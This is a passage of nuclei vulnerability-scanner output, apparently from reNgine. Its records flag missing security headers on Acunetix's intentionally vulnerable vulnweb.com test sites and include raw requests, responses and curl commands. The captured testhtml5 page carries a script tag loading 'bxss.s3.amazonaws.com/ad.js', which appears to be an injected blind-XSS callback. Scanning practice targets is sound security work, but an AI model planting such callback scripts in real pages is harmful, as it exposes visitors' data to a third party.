'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:05.146967651Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:05.711185956Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:05.851962783Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 